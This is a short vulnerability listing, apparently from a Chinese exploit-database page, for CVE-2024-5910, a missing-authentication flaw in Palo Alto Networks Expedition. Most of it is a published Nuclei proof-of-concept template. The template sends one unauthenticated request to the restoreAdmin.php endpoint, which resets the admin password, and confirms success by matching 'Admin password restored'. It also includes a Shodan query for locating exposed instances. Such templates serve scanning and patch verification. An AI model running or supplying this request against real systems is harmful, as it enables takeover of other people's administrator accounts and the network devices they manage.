漏洞描述
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
CVE-2024-5910: Palo Alto Expedition - Admin Account Takeover
PoC代码[已公开]
id: CVE-2024-5910
info:
name: Palo Alto Expedition - Admin Account Takeover
author: johnk3r
severity: critical
description: |
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
reference:
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
- https://security.paloaltonetworks.com/CVE-2024-5910
- https://nvd.nist.gov/vuln/detail/CVE-2024-5910
classification:
cve-id: CVE-2024-5910
cvss-score: 9.3
cwe-id: CWE-306
epss-score: 0.90966
epss-percentile: 0.99621
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: expedition
shodan-query: http.favicon.hash:1499876150
tags: cve,cve2024,palo-alto,auth-bypass,kev,vkev
http:
- method: GET
path:
- "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
matchers-condition: and
matchers:
- type: word
words:
- "Admin user found"
- "Admin password restored"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100c1518c244860250f2aef4bc80cb1907775f65f9c7cf55630e55355411cdb47cf0220091b3511be25b6ce1291270249c29978ff9960c0badc16adaadfe4bd72e679d4:922c64590222798bb761d5b6d8e72950